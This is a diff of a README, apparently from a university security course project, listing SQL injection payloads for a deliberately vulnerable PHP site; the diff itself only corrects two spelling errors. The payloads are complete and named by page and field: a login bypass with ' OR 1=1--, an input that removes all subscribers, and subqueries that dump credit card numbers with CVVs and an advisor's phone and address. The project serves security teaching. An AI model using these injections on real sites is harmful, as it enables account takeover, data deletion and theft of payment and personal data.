Saad2814/CPSC525Project/README.md

     Login page - password field (index.php) - Allows the attacker to login by only knowing a valid username and without knowing the correct password:
     ' OR 1=1--

-    Unsubscribe page - username field (unsubscribe.php) - Removes all users from the newletter and mailing list:
+    Unsubscribe page - username field (unsubscribe.php) - Removes all users from the newsletter and mailing list:
     ' OR 1=1--

-    Transactions page - ccnum field (transactions.php) - Displays the credit card information of all users who have made transcations:
+    Transactions page - ccnum field (transactions.php) - Displays the credit card information of all users who have made transactions:
     '|| (SELECT group_concat(course || ' - ' || ccnum || ' - ' || cvv || ' - ' || expDate, '; ') FROM transactions) ||'

     Appointments page - notes field (appt_selection.php) - Displays the private info of a specified advisor:
     NOTE: change advisor@example.com to an actual advisor email shown on the page '|| (SELECT phonenumber || ' - ' || address FROM advisor WHERE email = 'advisor@example.com') ||'